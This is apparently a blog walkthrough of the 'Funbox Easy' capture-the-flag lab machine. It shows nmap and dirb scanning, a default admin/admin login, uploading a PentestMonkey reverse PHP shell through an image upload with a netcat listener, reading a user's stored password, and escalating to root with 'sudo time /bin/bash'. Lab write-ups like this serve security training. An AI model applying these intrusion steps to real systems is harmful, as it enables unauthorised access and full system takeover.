root@blog:~#

View on GitHub

Funbox Easy

RECON

Ip Search
Apache Server
image14

Nmap Scan

nmap 192.168.54.111

Knowing Funbox Rookie not really expecting much from nmap. Dirb will be better
image11
Dirb

 dirb http:// 192.168.54.111

image9
image13

ENUMURATION

Admin Page

 Name: admin  
 Pass: admin

Accepts basic admin credentials
image10
Add New Book
Notice the image files
image7

Create New Book
Uploading reverse PHP Shell in images
image2 Shell Exploit
Pentest Monkey Reverse PHP
image1 Configure the Shell
Open up a Netcat listener

nc -lvp 8000

image16

Find shell
Running drib on the store page it appears to be using bootstrap. Check the img directory
image3
Image Index
image4

Privilege Escalation

Reverse Shell Opening the php lands a reverse shell image6

User Passwords

 cd home  
 cd tony  
 cat password.txt

image15

SSH tony

 ssh tony@192.168.54.111  
 Password: yxcvbnmYYY  
 sudo -l

pkexec, time and mtr can help us escalate to root
image12

Root Escalation

Bin Bash

 sudo time /bin/bash

image5

Root Flag

  cd root

image8

Local Flag

 cd var  
 cd www

image17